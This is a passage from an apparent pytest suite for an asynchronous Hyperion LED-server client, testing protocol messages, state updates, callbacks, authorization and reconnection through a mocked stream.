"info": {"instance": instance},
"success": True,
}
await rw.add_flow(
[
("write", instance_switchto_request),
("read", instance_switchto_response),
]
)
assert await hc.async_send_switch_instance(instance=instance)
await rw.block_until_flow_empty()
assert hc.is_connected
assert hc.instance == instance
assert hc.target_instance == instance
assert not hc.has_loaded_state
await _disconnect_and_assert_finished(rw, hc)
# Ensure there is no live instance, but that the target instance is the
# one that was switched to.
assert hc.target_instance == instance
assert hc.instance is None
@pytest.mark.asyncio
async def test_receive_wrong_data_type(
event_loop: asyncio.AbstractEventLoop, advance_time: EventLoopClockAdvancer
) -> None:
"""Test that receiving the wrong data-type is handled."""
rw = MockStreamReaderWriter(
[
("write", {**SERVERINFO_REQUEST, **{"tan": 1}}),
]
)
hc = await _create_client_and_connect(rw, raw_connection=True)
task = asyncio.create_task(hc.async_get_serverinfo())
await rw.block_until_flow_empty()
await rw.add_flow(
[
("read", ["this", "is", "not", "a", "dict"]),
]
)
await advance_time(const.DEFAULT_TIMEOUT_SECS)
assert not await task
await _disconnect_and_assert_finished(rw, hc)
@pytest.mark.asyncio
async def test_is_on(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test the client reports correctly on whether components are on."""
hc = hyperion_fixture.hc
with open(_get_test_filepath(FILE_SERVERINFO_RESPONSE)) as fh:
serverinfo_command_response = fh.readline()
serverinfo = json.loads(serverinfo_command_response)
# Verify server info is as expected.
assert hc.serverinfo == serverinfo[const.KEY_INFO]
# Verify the individual components.
assert hc.is_on(components=[const.KEY_COMPONENTID_ALL])
assert hc.is_on(components=[const.KEY_COMPONENTID_SMOOTHING])
assert hc.is_on(components=[const.KEY_COMPONENTID_BLACKBORDER])
assert not hc.is_on(components=[const.KEY_COMPONENTID_FORWARDER])
assert not hc.is_on(components=[const.KEY_COMPONENTID_BOBLIGHTSERVER])
assert not hc.is_on(components=[const.KEY_COMPONENTID_GRABBER])
assert hc.is_on(components=[const.KEY_COMPONENTID_V4L])
assert hc.is_on(components=[const.KEY_COMPONENTID_LEDDEVICE])
# Verify combinations.
assert hc.is_on(
components=[
const.KEY_COMPONENTID_ALL,
const.KEY_COMPONENTID_SMOOTHING,
const.KEY_COMPONENTID_BLACKBORDER,
]
)
assert not hc.is_on(
components=[
const.KEY_COMPONENTID_ALL,
const.KEY_COMPONENTID_GRABBER,
const.KEY_COMPONENTID_BLACKBORDER,
]
)
# Verify default.
assert hc.is_on()
@pytest.mark.asyncio
async def test_update_component(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating components."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
# === Verify flipping a component.
components_update = {
"command": "components-update",
"data": {"enabled": False, "name": "SMOOTHING"},
}
assert hc.is_on(components=[const.KEY_COMPONENTID_SMOOTHING])
await rw.add_flow([("read", components_update)])
await _block_until_done(rw)
assert not hc.is_on(components=[const.KEY_COMPONENTID_SMOOTHING])
# === Verify a component change where the component name is not existing.
component_name = "NOT_EXISTING"
components_update = {
"command": "components-update",
"data": {"enabled": True, "name": component_name},
}
assert not hc.is_on(components=[component_name])
await rw.add_flow([("read", components_update)])
await _block_until_done(rw)
assert hc.is_on(components=[component_name])
@pytest.mark.asyncio
async def test_update_adjustment(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating adjustments."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
adjustment_update = {
"command": "adjustment-update",
"data": [{"brightness": 25}],
}
assert hc.adjustment
assert hc.adjustment[0]["brightness"] == 83
await rw.add_flow([("read", adjustment_update)])
await _block_until_done(rw)
assert hc.adjustment[0]["brightness"] == 25
@pytest.mark.asyncio
async def test_update_effect_list(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating effect list."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
effect = {
"args": {
"hueChange": 60,
"reverse": False,
"rotationTime": 60,
"smoothing-custom-settings": None,
},
"file": ":/effects//mood-blobs-blue.json",
"name": "Blue mood blobs",
"script": ":/effects//mood-blobs.py",
}
effects_update = {
"command": "effects-update",
"data": [effect],
}
await rw.add_flow([("read", effects_update)])
await _block_until_done(rw)
assert hc.effects
assert len(hc.effects) == 1
assert hc.effects[0] == effect
@pytest.mark.asyncio
async def test_update_priorities(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating priorities."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
priorities = [
{
"active": True,
"componentId": "GRABBER",
"origin": "System",
"owner": "X11",
"priority": 250,
"visible": True,
},
{
"active": True,
"componentId": "EFFECT",
"origin": "System",
"owner": "Warm mood blobs",
"priority": 254,
"visible": False,
},
{
"active": True,
"componentId": "COLOR",
"origin": "System",
"owner": "System",
"priority": 40,
"value": {"HSL": [65535, 0, 0], "RGB": [0, 0, 0]},
"visible": False,
},
]
priorities_update = {
"command": "priorities-update",
"data": {"priorities": priorities, "priorities_autoselect": False},
}
assert hc.priorities
assert len(hc.priorities) == 2
assert hc.priorities_autoselect
assert hc.visible_priority
assert hc.visible_priority["priority"] == 240
await rw.add_flow([("read", priorities_update)])
await _block_until_done(rw)
assert hc.priorities == priorities
assert hc.visible_priority == priorities[0]
assert not hc.priorities_autoselect
priorities_update = {
"command": "priorities-update",
"data": {"priorities": [], "priorities_autoselect": True},
}
await rw.add_flow([("read", priorities_update)])
await _block_until_done(rw)
assert hc.priorities_autoselect is not None
assert hc.visible_priority is None
@pytest.mark.asyncio
async def test_update_instances(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test updating instances."""
hc = await _create_client_and_connect(rw)
assert hc.instances
assert len(hc.instances) == 2
assert hc.instance == 0
assert hc.target_instance == 0
instances = [
{"instance": 0, "running": True, "friendly_name": "Test instance 0"},
{"instance": 1, "running": True, "friendly_name": "Test instance 1"},
{"instance": 2, "running": True, "friendly_name": "Test instance 2"},
]
instances_update = {
"command": "instance-update",
"data": instances,
}
await rw.add_flow([("read", instances_update)])
await _block_until_done(rw)
assert hc.instances == instances
# Now update instances again to exclude instance 1 (it should reset to 0).
instances = [
{"instance": 0, "running": False, "friendly_name": "Test instance 0"},
{"instance": 1, "running": True, "friendly_name": "Test instance 1"},
{"instance": 2, "running": True, "friendly_name": "Test instance 2"},
]
instances_update = {
"command": "instance-update",
"data": instances,
}
await rw.add_flow(
[
("read", instances_update),
("close", None),
]
)
# Because the target instance is no longer running, the client should disconnect
# automatically.
await _block_until_done(rw)
assert not hc.is_connected
await rw.assert_flow_finished()
assert hc.target_instance == 0
assert hc.instance is None
@pytest.mark.asyncio
async def test_update_led_mapping_type(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating LED mapping type."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
led_mapping_type = "unicolor_mean"
led_mapping_type_update = {
"command": "imageToLedMapping-update",
"data": {"imageToLedMappingType": led_mapping_type},
}
assert hc.led_mapping_type != led_mapping_type
await rw.add_flow([("read", led_mapping_type_update)])
await _block_until_done(rw)
assert hc.led_mapping_type == led_mapping_type
@pytest.mark.asyncio
async def test_update_sessions(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating sessions."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
sessions = [
{
"address": "192.168.58.169",
"domain": "local.",
"host": "ubuntu-2",
"name": "My Hyperion Config@ubuntu:8090",
"port": 8090,
"type": "_hyperiond-http._tcp.",
}
]
sessions_update = {
"command": "sessions-update",
"data": sessions,
}
assert hc.sessions == []
await rw.add_flow([("read", sessions_update)])
await _block_until_done(rw)
assert hc.sessions == sessions
@pytest.mark.asyncio
async def test_videomode(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating videomode."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
videomode = "3DSBS"
videomode_update = {
"command": "videomode-update",
"data": {"videomode": videomode},
}
assert hc.videomode == "2D"
await rw.add_flow([("read", videomode_update)])
await _block_until_done(rw)
assert hc.videomode == videomode
@pytest.mark.asyncio
async def test_update_leds(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating LEDs."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
leds = [{"hmin": 0.0, "hmax": 1.0, "vmin": 0.0, "vmax": 1.0}]
leds_update = {"command": "leds-update", "data": {"leds": leds}}
assert hc.leds
assert len(hc.leds) == 254
await rw.add_flow([("read", leds_update)])
await _block_until_done(rw)
assert hc.leds == leds
@pytest.mark.asyncio
async def test_async_send_set_color(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test controlling color."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
color_in = {
"color": [0, 0, 255],
"command": "color",
"origin": "My Fancy App",
"priority": 50,
}
await rw.add_flow([("write", color_in)])
assert await hc.async_send_set_color(**color_in)
await _block_until_done(rw)
color_in = {
"color": [0, 0, 255],
"priority": 50,
}
color_out = {
"command": "color",
"color": [0, 0, 255],
"priority": 50,
"origin": const.DEFAULT_ORIGIN,
}
await rw.add_flow([("write", color_out)])
assert await hc.async_send_set_color(**color_in)
await _block_until_done(rw)
@pytest.mark.asyncio
async def test_async_send_set_effect(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test controlling effect."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
effect_in = {
"command": "effect",
"effect": {"name": "Warm mood blobs"},
"priority": 50,
"origin": "My Fancy App",
}
await rw.add_flow([("write", effect_in)])
assert await hc.async_send_set_effect(**effect_in)
effect_in = {
"effect": {"name": "Warm mood blobs"},
"priority": 50,
}
effect_out = {
"command": "effect",
"effect": {"name": "Warm mood blobs"},
"priority": 50,
"origin": const.DEFAULT_ORIGIN,
}
await rw.add_flow([("write", effect_out)])
assert await hc.async_send_set_effect(**effect_in)
@pytest.mark.asyncio
async def test_async_send_set_image(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test controlling image."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
image_in = {
"command": "image",
"imagedata": "VGhpcyBpcyBubyBpbWFnZSEgOik=",
"name": "Name of Image",
"format": "auto",
"priority": 50,
"duration": 5000,
"origin": "My Fancy App",
}
await rw.add_flow([("write", image_in)])
assert await hc.async_send_set_image(**image_in)
image_in = {
"imagedata": "VGhpcyBpcyBubyBpbWFnZSEgOik=",
"name": "Name of Image",
"format": "auto",
"priority": 50,
"duration": 5000,
}
image_out = {
"command": "image",
"imagedata": "VGhpcyBpcyBubyBpbWFnZSEgOik=",
"name": "Name of Image",
"format": "auto",
"priority": 50,
"duration": 5000,
"origin": const.DEFAULT_ORIGIN,
}
await rw.add_flow([("write", image_out)])
assert await hc.async_send_set_image(**image_in)
@pytest.mark.asyncio
async def test_async_send_clear(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test clearing priorities."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
clear_in = {
"command": "clear",
"priority": 50,
}
await rw.add_flow([("write", clear_in)])
assert await hc.async_send_clear(**clear_in)
await rw.add_flow([("write", clear_in)])
assert await hc.async_send_clear(priority=50)
@pytest.mark.asyncio
async def test_async_send_set_adjustment(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test setting adjustment."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
adjustment_in = {"command": "adjustment", "adjustment": {"gammaRed": 1.5}}
await rw.add_flow([("write", adjustment_in)])
assert await hc.async_send_set_adjustment(**adjustment_in)
await rw.add_flow([("write", adjustment_in)])
assert await hc.async_send_set_adjustment(adjustment={"gammaRed": 1.5})
@pytest.mark.asyncio
async def test_async_send_set_led_mapping_type(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Test setting adjustment."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
led_mapping_type_in = {
"command": "processing",
"mappingType": "multicolor_mean",
}
await rw.add_flow([("write", led_mapping_type_in)])
assert await hc.async_send_set_led_mapping_type(**led_mapping_type_in)
await rw.add_flow([("write", led_mapping_type_in)])
assert await hc.async_send_set_led_mapping_type(mappingType="multicolor_mean")
@pytest.mark.asyncio
async def test_async_send_set_videomode(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test setting videomode."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
videomode_in = {"command": "videomode", "videoMode": "3DTAB"}
await rw.add_flow([("write", videomode_in)])
assert await hc.async_send_set_videomode(**videomode_in)
await rw.add_flow([("write", videomode_in)])
assert await hc.async_send_set_videomode(videoMode="3DTAB")
@pytest.mark.asyncio
async def test_async_send_set_component(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test setting component."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
componentstate = {
"component": "LEDDEVICE",
"state": False,
}
component_in = {
"command": "componentstate",
"componentstate": componentstate,
}
await rw.add_flow([("write", component_in)])
assert await hc.async_send_set_component(**component_in)
await rw.add_flow([("write", component_in)])
assert await hc.async_send_set_component(componentstate=componentstate)
@pytest.mark.asyncio
async def test_async_send_set_sourceselect(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test setting sourceselect."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
sourceselect_in = {"command": "sourceselect", "priority": 50}
await rw.add_flow([("write", sourceselect_in)])
assert await hc.async_send_set_sourceselect(**sourceselect_in)
await rw.add_flow([("write", sourceselect_in)])
assert await hc.async_send_set_sourceselect(priority=50)
@pytest.mark.asyncio
async def test_start_async_send_stop_switch_instance(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Test starting, stopping and switching instances."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
start_in = {"command": "instance", "subcommand": "startInstance", "instance": 1}
await rw.add_flow([("write", start_in)])
assert await hc.async_send_start_instance(**start_in)
await rw.add_flow([("write", start_in)])
assert await hc.async_send_start_instance(instance=1)
stop_in = {"command": "instance", "subcommand": "stopInstance", "instance": 1}
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_stop_instance(**stop_in)
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_stop_instance(instance=1)
switch_in = {"command": "instance", "subcommand": "switchTo", "instance": 1}
await rw.add_flow([("write", switch_in)])
assert await hc.async_send_switch_instance(**switch_in)
await rw.add_flow([("write", switch_in)])
assert await hc.async_send_switch_instance(instance=1)
@pytest.mark.asyncio
async def test_start_async_send_stop_image_stream(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Test starting and stopping an image stream."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
start_in = {"command": "ledcolors", "subcommand": "imagestream-start"}
await rw.add_flow([("write", start_in)])
assert await hc.async_send_image_stream_start(**start_in)
await rw.add_flow([("write", start_in)])
assert await hc.async_send_image_stream_start()
stop_in = {"command": "ledcolors", "subcommand": "imagestream-stop"}
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_image_stream_stop(**stop_in)
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_image_stream_stop()
@pytest.mark.asyncio
async def test_async_send_start_stop_led_stream(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Test starting and stopping an led stream."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
start_in = {"command": "ledcolors", "subcommand": "ledstream-start"}
await rw.add_flow([("write", start_in)])
assert await hc.async_send_led_stream_start(**start_in)
await rw.add_flow([("write", start_in)])
assert await hc.async_send_led_stream_start()
stop_in = {"command": "ledcolors", "subcommand": "ledstream-stop"}
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_led_stream_stop(**stop_in)
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_led_stream_stop()
@pytest.mark.asyncio
# pylint: disable=too-many-statements
async def test_callbacks(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test updating components."""
cb = Mock()
hc = await _create_client_and_connect(
rw,
default_callback=cb.default_callback,
callbacks={
"components-update": cb.component_callback,
"serverinfo": cb.serverinfo_callback,
"client-update": cb.client_callback,
},
)
assert cb.client_callback.call_args_list == [
call(
{
"command": "client-update",
"connected": True,
"logged-in": False,
"instance": const.DEFAULT_INSTANCE,
"loaded-state": False,
}
),
call(
{
"command": "client-update",
"connected": True,
"logged-in": True,
"instance": const.DEFAULT_INSTANCE,
"loaded-state": False,
}
),
call(
{
"command": "client-update",
"connected": True,
"logged-in": True,
"instance": const.DEFAULT_INSTANCE,
"loaded-state": True,
}
),
]
assert cb.serverinfo_callback.call_args[0][0] == _read_file(
FILE_SERVERINFO_RESPONSE
)
cb.reset_mock()
# === Flip a component.
components_update = {
"command": "components-update",
"data": {"enabled": False, "name": "SMOOTHING"},
}
# Make sure the callback was called.
await rw.add_flow([("read", components_update)])
await _block_until_done(rw)
cb.default_callback.assert_not_called()
cb.component_callback.assert_called_once_with(components_update)
cb.reset_mock()
# Call with a new update that does not have a registered callback.
random_update_value = "random-update"
random_update = {
"command": random_update_value,
}
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.default_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Now set a callback for that update.
hc.set_callbacks({random_update_value: cb.first_callback})
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Now add a second callback for that update.
hc.add_callbacks({random_update_value: cb.second_callback})
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_called_once_with(random_update)
cb.second_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Now add multiple callbacks.
hc.add_callbacks({random_update_value: [cb.third_callback, cb.fourth_callback]})
hc.add_callbacks({})
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_called_once_with(random_update)
cb.second_callback.assert_called_once_with(random_update)
cb.third_callback.assert_called_once_with(random_update)
cb.fourth_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Set multiple callbacks (effectively removing a few).
hc.set_callbacks({random_update_value: [cb.third_callback, cb.fourth_callback]})
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_not_called()
cb.second_callback.assert_not_called()
cb.third_callback.assert_called_once_with(random_update)
cb.fourth_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Remove some callbacks.
hc.add_callbacks({random_update_value: [cb.first_callback, cb.second_callback]})
hc.remove_callbacks({random_update_value: cb.third_callback})
hc.remove_callbacks({random_update_value: [cb.fourth_callback]})
hc.remove_callbacks({})
hc.remove_callbacks({"not-here": cb.null_callback})
hc.remove_callbacks({random_update_value: []})
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_called_once_with(random_update)
cb.second_callback.assert_called_once_with(random_update)
cb.third_callback.assert_not_called()
cb.fourth_callback.assert_not_called()
cb.null_callback.assert_not_called()
cb.reset_mock()
# Remove all callbacks.
hc.set_callbacks(None)
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_not_called()
cb.second_callback.assert_not_called()
cb.reset_mock()
# Add another default callback.
hc.add_default_callback(cb.second_default_callback)
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.default_callback.assert_called_once_with(random_update)
cb.second_default_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Remove a default callback.
hc.remove_default_callback(cb.default_callback)
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.default_callback.assert_not_called()
cb.second_default_callback.assert_called_once_with(random_update)
cb.reset_mock()
awaitable_json = None
async def awaitable_callback(arg: dict[str, Any]) -> None:
nonlocal awaitable_json
awaitable_json = arg
# Set an async default callback.
hc.set_default_callback(awaitable_callback)
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.default_callback.assert_not_called()
cb.second_default_callback.assert_not_called()
assert awaitable_json == random_update
# Verify disconnection callback.
hc.set_callbacks({"client-update": cb.client_callback})
await _disconnect_and_assert_finished(rw, hc)
cb.client_callback.assert_called_once_with(
{
"command": "client-update",
"connected": False,
"instance": None,
"loaded-state": False,
"logged-in": False,
},
)
@pytest.mark.asyncio
async def test_is_auth_required(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test determining if authorization is required."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
auth_request = {"command": "authorize", "subcommand": "tokenRequired", "tan": 2}
auth_response = {
"command": "authorize-tokenRequired",
"info": {"required": True},
"success": True,
"tan": 2,
}
await rw.add_flow([("write", auth_request), ("read", auth_response)])
received = await hc.async_is_auth_required()
await _block_until_done(rw)
assert received == auth_response
@pytest.mark.asyncio
async def test_async_send_login(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test setting videomode."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
token = "<PASSWORD>"
auth_login_in = {
"command": "authorize",
"subcommand": "login",
"token": token,
}
await rw.add_flow([("write", auth_login_in)])
assert await hc.async_send_login(**auth_login_in)
await rw.add_flow([("write", auth_login_in)])
assert await hc.async_send_login(token=token)
@pytest.mark.asyncio
async def test_disconnecting_leaves_no_tasks(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Verify stopping the background task."""
before_tasks = asyncio.all_tasks()
hc = await _create_client_and_connect(rw)
await _disconnect_and_assert_finished(rw, hc)
assert before_tasks == asyncio.all_tasks()
@pytest.mark.asyncio
async def test_async_send_logout(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test setting videomode."""
before_tasks = asyncio.all_tasks()
hc = await _create_client_and_connect(rw)
auth_logout_in = {
"command": "authorize",
"subcommand": "logout",
}
await rw.add_flow([("write", auth_logout_in)])
assert await hc.async_send_logout(**auth_logout_in)
await rw.add_flow([("write", auth_logout_in)])
assert await hc.async_send_logout()
# A logout success response should cause the client to disconnect.
auth_logout_out = {
"command": "authorize-logout",
"success": True,
}
await rw.add_flow([("read", auth_logout_out), ("close", None)])
await _block_until_done(rw)
assert not hc.is_connected
await rw.assert_flow_finished()
# Verify there are no tasks left running (logout is interesting
# in that the disconnection is from the receive task, so cancellation
# of the receive task could cut the disconnection process off).
assert before_tasks == asyncio.all_tasks()
@pytest.mark.asyncio
async def test_async_send_request_token(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test requesting an auth token."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
# Test requesting a token.
request_token_in: dict[str, Any] = {
"command": "authorize",
"subcommand": "requestToken",
"comment": "Test",
"id": "T3c92",
}
await rw.add_flow([("write", request_token_in)])
assert await hc.async_send_request_token(**request_token_in)
# Test requesting a token with minimal provided parameters, will cause
# the ID to be automatically generated.
small_request_token_in = {
"comment": "Test",
}
# Ensure an ID gets generated.
await rw.add_flow(
[
(
"write",
lambda x: (
len(x.get("id")) == 5
and [x.get(key) for key in ["command", "subcommand", "comment"]]
== [
request_token_in.get(key)
for key in ["command", "subcommand", "comment"]
]
),
)
]
)
assert await hc.async_send_request_token(**small_request_token_in)
# Abort a request for a token.
request_token_in["accept"] = False
await rw.add_flow([("write", request_token_in)])
assert await hc.async_send_request_token_abort(**request_token_in)
@pytest.mark.asyncio
async def test_async_send_serverinfo(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test requesting serverinfo."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
await rw.add_flow([("write", SERVERINFO_REQUEST)])
assert await hc.async_send_get_serverinfo(**SERVERINFO_REQUEST)
def test_threaded_client() -> None:
"""Test the threaded client."""
hc = client.ThreadedHyperionClient(
TEST_HOST,
TEST_PORT,
)
# Start the loop in the other thread.
hc.start()
hc.wait_for_client_init()
# Note: MockStreamReaderWriter is not thread safe, so only a very limited test
# is performed here.
with patch("asyncio.open_connection", side_effect=ConnectionError):
assert not hc.client_connect()
assert not hc.is_connected
hc.stop()
hc.join()
def test_threaded_client_has_correct_methods() -> None:
"""Verify the threaded client exports all the correct methods."""
contents = dir(
client.ThreadedHyperionClient(
TEST_HOST,
TEST_PORT,
)
)
# Verify all async methods have a sync wrapped version.
for name, _ in inspect.getmembers(
client.ThreadedHyperionClient, inspect.iscoroutinefunction
):
if name.startswith("async_"):
assert name[len("async_") :] in contents
for name, _ in inspect.getmembers(
client.ThreadedHyperionClient, lambda o: isinstance(o, property)
):
assert name in contents
@pytest.mark.asyncio
async def test_client_write_and_close_handles_network_issues(
event_loop: asyncio.AbstractEventLoop,
rw: MockStreamReaderWriter,
) -> None:
"""Verify sending data does not throw exceptions."""
hc = await _create_client_and_connect(rw)
# Verify none of these write operations result in an exception
# propagating to the test.
await rw.add_flow([("write", ConnectionError("Write exception"))])
assert not await hc.async_send_image_stream_start()
await rw.add_flow([("close", ConnectionError("Close exception"))])
assert not await hc.async_client_disconnect()
await rw.assert_flow_finished()
@pytest.mark.asyncio
async def test_client_handles_network_issues_bad_read(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Verify a bad read causes a reconnection."""
rw = hyperion_fixture.rw
with patch("asyncio.open_connection", return_value=(rw, rw)):
await rw.add_flow(
[
("read", ConnectionError("Read exception")),
("close", None),
("write", {**SERVERINFO_REQUEST, **{"tan": 2}}),
(
"read",
{**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 2}},
),
]
)
await _block_until_done(rw)
@pytest.mark.asyncio
async def test_client_handles_network_issues_unexpected_close(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Verify an unexpected close causes a reconnection."""
# == Verify an empty read causes a disconnect and reconnect.
(rw, _) = hyperion_fixture.rw, hyperion_fixture.hc
# == Read returns empty, connection closed, but instantly re-established.
with patch("asyncio.open_connection", return_value=(rw, rw)):
await rw.add_flow(
[
("read", ""),
("close", None),
("write", {**SERVERINFO_REQUEST, **{"tan": 2}}),
(
"read",
{**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 2}},
),
]
)
await _block_until_done(rw)
@pytest.mark.asyncio
async def test_client_handles_network_issues_bad_read_cannot_reconnect_ads(
event_loop: asyncio.AbstractEventLoop,
advance_time: EventLoopClockAdvancer,
hyperion_fixture: HyperionFixture,
) -> None:
"""Verify behavior after a bad read when the connection cannot be re-established."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
# == Read throws an exception, connection closed, cannot be re-established.
with patch("asyncio.open_connection", side_effect=ConnectionError):
await rw.add_flow([("read", ConnectionError("Read error")), ("close", None)])
await rw.block_until_flow_empty()
# Wait f"{const.DEFAULT_CONNECTION_RETRY_DELAY_SECS}" seconds and then the
# connection should be re-established.
# Check at half that timeout that we're still not connected.
assert not hc.is_connected
await advance_time(const.DEFAULT_CONNECTION_RETRY_DELAY_SECS / 2)
assert not hc.is_connected
# Stage 4: Fast-forward the remaining half of the timeout (+1 to ensure
# we're definitely on the far side of the timeout), and it should
# automatically reload.
with patch("asyncio.open_connection", return_value=(rw, rw)):
await rw.add_flow(
[
("write", {**SERVERINFO_REQUEST, **{"tan": 2}}),
(
"read",
{**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 2}},
),
]
)
await advance_time((const.DEFAULT_CONNECTION_RETRY_DELAY_SECS / 2) + 1)
await _block_until_done(rw)
@pytest.mark.asyncio
async def test_client_connect_handles_network_issues_cannot_reconnect_connection_error(
event_loop: asyncio.AbstractEventLoop,
rw: MockStreamReaderWriter,
) -> None:
"""Verify connecting does throw exceptions and behaves correctly."""
hc = await _create_client_and_connect(rw)
with patch(
"asyncio.open_connection",
side_effect=ConnectionError("Connection exception"),
):
await rw.add_flow([("read", ""), ("close", None)])
await rw.block_until_flow_empty()
assert not hc.is_connected
# Disconnect to avoid it attempting to reconnect.
assert await hc.async_client_disconnect()
await rw.assert_flow_finished()
@pytest.mark.asyncio
async def test_client_connection_timeout(event_loop: asyncio.AbstractEventLoop) -> None:
"""Verify connection and read timeouts behave correctly."""
# == Verify timeout is dealt with correctly during connection.
with patch("asyncio.open_connection", side_effect=asyncio.TimeoutError):
hc = client.HyperionClient(TEST_HOST, TEST_PORT)
assert not await hc.async_client_connect()
@pytest.mark.asyncio
async def test_client_timeout(
event_loop: asyncio.AbstractEventLoop,
advance_time: EventLoopClockAdvancer,
hyperion_fixture: HyperionFixture,
) -> None:
"""Verify connection and read timeouts behave correctly."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
# == Verify timeout is dealt with during read.
await rw.add_flow([("write", {**SERVERINFO_REQUEST, **{"tan": 2}})])
# Create a new task to get the serverinfo ...
task = asyncio.create_task(hc.async_get_serverinfo())
# ... wait until the flow is empty (i.e. the request is written to the
# server).
await rw.block_until_flow_empty()
# Advance the clock so it times out waiting.
await advance_time(const.DEFAULT_TIMEOUT_SECS * 2)
# Ensuring the task fails.
assert not await task
# == Verify custom timeouts function in calls.
await rw.add_flow([("write", {**SERVERINFO_REQUEST, **{"tan": 3}})])
# Create a task thatL fetches serverinfo and will wait 3 times the default.
task = asyncio.create_task(
